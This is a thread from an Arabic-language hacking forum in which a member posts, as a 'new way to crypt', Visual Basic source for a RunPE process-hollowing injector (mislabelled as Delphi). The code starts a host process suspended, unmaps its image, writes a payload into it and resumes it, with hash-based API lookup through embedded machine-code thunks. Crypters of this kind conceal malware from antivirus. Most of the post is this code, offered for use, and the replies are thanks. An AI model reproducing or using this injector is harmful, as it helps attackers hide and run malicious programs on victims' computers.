• أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
  • بادئ الموضوع !»°بہًكہًر الہًعہًراقہًي°«!
  • تاريخ البدء
الحالة
مغلق و غير مفتوح للمزيد من الردود.
غير متصل

!»°بہًكہًر الہًعہًراقہًي°«!

أداري أقسام حماية الأجهزة

إنضم
7 فبراير 2015
المشاركات
674
الإعجابات
1,477
النقاط
515
الإقامة
العراق\واسط
الإجابات المقدمة: 0
#1

كيف الحال اعضاء وزوار عراق تيم انشاء تكونوا بصحه وسلامه

------------

شرح اليوم التشفير بالدلفي بطريقه جديده حصريا على ارض الابداع عراق تيم


التشفير عن طريق استخدام
RunPe + Invoke


طبعا لم يتسنى لي وقت لاعمل فديو لاني مستعجل انو هذا اخر موضوع لي لحد شهر الثامن بسب الامتحانات


اتركم مع الاكواد


الكود
PHP:
Declare Function CallThunk8 Lib "user32" Alias "CallWindowProcA" (ByRef cCode As Currency, Optional ByVal lP1 As Long, Optional ByVal lP2 As Long, Optional ByVal lP3 As Long, Optional ByVal lP4 As Long) As LongDeclare Function ExeThunk Lib "user32" Alias "CallWindowProcW" (ByVal Address As Any, Optional ByVal Param1 As Long, Optional ByVal Param2 As Long, Optional ByVal Param3 As Long, Optional ByVal Param4 As Long) As LongDeclare Function sMulDiv Lib "kernel32" Alias "MulDiv" (ByRef A As Any, Optional ByVal B As Long = 1, Optional ByVal c As Long = 1) As LongPrivate ASM_GETAPIPTR(170)            As BytePrivate ASM_CALLCODE(255)              As BytePrivate sMEMORY(40)                    As BytePrivate sVALUE                        As BytePrivate IMAGE_DOS_HEADER(65)          As BytePrivate IMAGE_NT_HEADERS(256)          As BytePrivate IMAGE_SECTION_HEADER(60)      As BytePrivate PROCESS_INFORMATION(44)        As BytePrivate tCONTEXT(210)                  As BytePrivate STARTUPINFO(16)                As LongPrivate sParams                        As LongPrivate ImageBase                      As LongPrivate hProcess                      As LongPrivate hThread                        As LongPrivate SizeOfImage                    As LongPrivate SizeOfHeaders                  As LongPrivate sEntryPoint                    As LongPrivate VirtualAddress                As LongPrivate sRawDataPoint                  As LongPrivate sRawData                      As LongPrivate Ebx                            As LongPrivate D                              As LongPrivate Z                              As LongPrivate vItem                          As VariantPrivate sSection                      As Integer

Public Function sInject(ByVal sHost As String, ByRef sBytes() As Byte)

For Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, _&HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H10)
sMEMORY(Z) = vItem
Z = Z + 1
sVALUE = 200 + 48
Next

Call MoveMemory(sMulDiv(STARTUPINFO(0)), sMulDiv(72), CLng("0"))
Call MoveMemory(sMulDiv(tCONTEXT(0)), sMulDiv(&H10007), &H1 + &H3 + &H4)
Call MoveMemory(sMulDiv(IMAGE_DOS_HEADER(0)), sMulDiv(sBytes(0)), &H72)
Call MoveMemory(sMulDiv(sParams), sMulDiv(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(IMAGE_NT_HEADERS(0)), sMulDiv(sBytes(sParams)), 256)
Call MoveMemory(sMulDiv(ImageBase), sMulDiv(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(SizeOfImage), sMulDiv(IMAGE_NT_HEADERS(80)), &H1 + &H3 + &H4)
Call MoveMemory(sMulDiv(SizeOfHeaders), sMulDiv(IMAGE_NT_HEADERS(84)), &H1 + &H3 + &H4)
Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(sSection), sMulDiv(IMAGE_NT_HEADERS(6)), &H2)
Call Invoke("KERNEL32", "CreateProcessW", 0, StrPtr(sHost), 0, 0, &H1, &H4, 0, 0, sMulDiv(STARTUPINFO(0)), sMulDiv(PROCESS_INFORMATION(0)))
Call MoveMemory(sMulDiv(hProcess), sMulDiv(PROCESS_INFORMATION(0)), &H1 + &H3)
Call MoveMemory(sMulDiv(hThread), sMulDiv(PROCESS_INFORMATION(4)), &H1 + &H3)
Call Invoke("NTDLL", "NtUnmapViewOfSection", hProcess, ImageBase)
Call Invoke("KERNEL32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H3000&, &H40)
Call Invoke("NTDLL", "NtWriteVirtualMemory", hProcess, ImageBase, sMulDiv(sBytes(0)), SizeOfHeaders, CLng("0"))
For D = 0 To sSection - 1
Call MoveMemory(sMulDiv(IMAGE_SECTION_HEADER(0)), sMulDiv(sBytes(sParams + sVALUE + 40& * D)), &H64)
Call MoveMemory(sMulDiv(VirtualAddress), sMulDiv(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(sRawData), sMulDiv(IMAGE_SECTION_HEADER(16)), &H1 + &H3 + &H4)
Call MoveMemory(sMulDiv(sRawDataPoint), sMulDiv(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
Call Invoke("NTDLL", "NtWriteVirtualMemory", hProcess, ImageBase + VirtualAddress, sMulDiv(sBytes(sRawDataPoint)), sRawData, CLng("0"))
Next
Call Invoke("NTDLL", "NtGetContextThread", hThread, sMulDiv(tCONTEXT(CLng("0"))))          Call Invoke("NTDLL", "NtWriteVirtualMemory", hProcess, Ebx + &H4 + &H1 + &H3, sMulDiv(VirtualAddress), &H1 + &H3 + &H2, CLng("0"))
Call MoveMemory(sMulDiv(tCONTEXT(176)), sMulDiv(ImageBase + sEntryPoint), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(sParams), sMulDiv(tCONTEXT(176)), &H5)
Call Invoke("NTDLL", "NtSetContextThread", hThread, sMulDiv(tCONTEXT(0)))
Call Invoke("NTDLL", "NtResumeThread", hThread, CLng("0"))
End Function
Public Sub MoveMemory(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)      ExeThunk sMulDiv(sMEMORY(0)), lpDest, lpSource, cBytes, CLng("0")  End Sub
Function Invoke(ByVal sDLL As String, hHash As String, ParamArray vParams() As Variant) As Long
On Error Resume NextDim vItem                      As VariantDim sThunk                      As String
Call PutThunk(THUNK_GETAPIPTR, ASM_GETAPIPTR)
For Each vItem In vParamssThunk = "68" & GetLng(vItem) & sThunkNext vItem
Call PutThunk(sThunk & "B8" & GetLng(ExeThunk(VarPtr(ASM_GETAPIPTR(CLng("0"))), _StrPtr(sDLL), gHash(hHash))) & "FFD0C3" & sThunk, ASM_CALLCODE)
Invoke = ExeThunk(VarPtr(ASM_CALLCODE(0)))

End Function
Private Function gHash(strHash) As LongOn Error Resume Next
Dim i          As LongDim lResult    As Long
For i = 1 To Len(strHash)lResult = CallThunk8(-439163333029263.6533@, lResult)lResult = lResult + Asc(Mid(strHash, i, 1))Next igHash = "&H" & String(8 - Len(Hex(lResult)), "0") & Hex(lResult)

End Function
Private Function GetLng(ByVal lLng As Long) As StringOn Error Resume NextDim lTMP                        As LonglTMP = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or ((lLng And &HFF0000) \ &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000) ' by Mike D SuttonIf (lLng And &H80&) Then lTMP = lTMP Or &H80000000GetLng = String(8 - Len(Hex(lTMP)), "0") & Hex(lTMP)End Function
Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)On Error Resume NextDim i                          As LongFor i = 0 To Len(sThunk) - 1 Step 2bvRet((i / 2)) = ("&H" & Mid(sThunk, i + 1, 2))Next iEnd Sub
Function THUNK_GETAPIPTR() As StringTHUNK_GETAPIPTR = "E82200000068A44E0EEC50E84300000083C408FF742404FFD0FF7424"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "0850E83000000083C408C3565531C0648B70308B760C8B761C8B6E08"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "8B7E208B3638471875F3803F6B7407803F4B7402EBE789E85D5EC355"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "52515356578B6C241C85ED74438B453C8B54057801EA8B4A188B5A20"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "01EBE330498B348B01EE31FF31C0FCAC84C07407C1CF0D01C7EBF43B"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "7C242075E18B5A2401EB668B0C4B8B5A1C01EB8B048B01E85F5E5B595A5DC3"End Function
الى هنا انتهى الشرح انتمى ان يكون نال اعجباكم دعواتكم بالنجاح لنعود اليكم بمواضيع جديده وحصريا على عراق تيم
اتركم براعيه الله

امير ايكل


المعاقب الصدري


ملخد هكسور


محمد العراقي


وفي الاخير رحم الله من قراء سوره الفاتحه على روح اخي وحبيبي علي الصقور

 


غير متصل

Developer
إنضم
7 مايو 2012
المشاركات
36
الإعجابات
0
النقاط
30
الإقامة
Algerie,Mascara
الإجابات المقدمة: 0
#2
رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

يعطيك الف عافية #
 


غير متصل

Developer
إنضم
12 مارس 2013
المشاركات
37
الإعجابات
1
النقاط
30
الإجابات المقدمة: 0
#3
رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

تسلم يدك شاكرين مجهودك​
 


متصل

Hack Team

.:: super ::.

إدارة الموقع
إنضم
12 أبريل 2015
المشاركات
1,071
الإعجابات
950
النقاط
555
الإقامة
IRAQ
الإجابات المقدمة: 1
#4
رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

عشت حبيبي ستمر الله يرحمك عزيزي علاوي
 


غير متصل

!»°بہًكہًر الہًعہًراقہًي°«!

أداري أقسام حماية الأجهزة

إنضم
7 فبراير 2015
المشاركات
674
الإعجابات
1,477
النقاط
515
الإقامة
العراق\واسط
الإجابات المقدمة: 0
#5
رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

نورتو اصدقائي تحياتي للجميع
 


غير متصل

DeveloPer Plus
إنضم
13 يناير 2015
المشاركات
158
الإعجابات
10
النقاط
50
الإقامة
iraq
الإجابات المقدمة: 0
#6
رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

مببببببدع عاشت ايدك
.
.
.
الله يرحمه ويدخله فسيح جناته :(
 


غير متصل

!»°بہًكہًر الہًعہًراقہًي°«!

أداري أقسام حماية الأجهزة

إنضم
7 فبراير 2015
المشاركات
674
الإعجابات
1,477
النقاط
515
الإقامة
العراق\واسط
الإجابات المقدمة: 0
#7


غير متصل

Girl - SilenT

<span style="font-weight: bold; text-shadow: #BBBB

مشرفات المنتدى
إنضم
1 أبريل 2015
المشاركات
225
الإعجابات
4
النقاط
50
الإجابات المقدمة: 0
#8
رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

عاشت ايدك ع موضوع استمر يامبدع


تحياتي


:{1!}:
 


غير متصل

Developer
إنضم
15 أغسطس 2014
المشاركات
24
الإعجابات
1
النقاط
15
الإجابات المقدمة: 0
#9
رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

هذا مو دلفي
oh god why.
 


غير متصل

!»°بہًكہًر الہًعہًراقہًي°«!

أداري أقسام حماية الأجهزة

إنضم
7 فبراير 2015
المشاركات
674
الإعجابات
1,477
النقاط
515
الإقامة
العراق\واسط
الإجابات المقدمة: 0
#10


الحالة
مغلق و غير مفتوح للمزيد من الردود.
الوسوم - Tag الوسوم - Tag
التشفير بالدلفي بطريقه جديده عن طريق استخدام  RunPe + Invoke